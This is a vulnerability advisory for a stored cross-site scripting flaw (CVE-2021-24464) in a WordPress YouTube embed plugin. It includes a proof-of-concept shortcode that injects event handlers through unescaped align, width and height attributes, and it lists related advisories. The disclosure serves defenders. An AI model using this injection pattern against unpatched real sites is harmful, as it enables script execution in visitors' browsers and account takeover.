YouTube Embed, Playlist and Popup < 2.3.9 – Contributor+ Stored XSS | CVE 2021-24464 | Plugin Vulnerabilities

Description

The plugin did not escape, validate or sanitise some of its shortcode options, available to users with a role as low as Contributor, leading to an authenticated Stored Cross-Site Scripting issue.

Proof of Concept

Affected attributes: unescaped align, width and height parameters of wpdevart_youtube shortcode.

[wpdevart_youtube align='center;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)' width='" onload="alert(2)//' height='" onmouseover="alert(3)//']dQw4w9WgXcQ[/wpdevart_youtube]

Affects Plugins

youtube-video-player

Fixed in 2.3.9

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

531b3fac-48b9-4821-a3aa-4db073d43aae

Timeline

Publicly Published

2021-06-28 (about 4 years ago)

Added

2021-06-28 (about 4 years ago)

Last Updated

2022-01-02 (about 3 years ago)

Other

Published

Title

Published

2025-01-16

Title

Responsivity <= 0.0.6 - Reflected Cross-Site Scripting

Published

2020-08-19

Title

Click to Top < 1.2.8 - Authenticated Stored Cross-Site Scripting

Published

2024-12-19

Title

Kintpv Wooconnect < 8.141 - Unauthenticated Stored Cross-Site Scripting

Published

2024-03-14

Title

LA-Studio Element Kit for Elementor < 1.3.7.5 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-07-16

Title

Image Wall < 3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting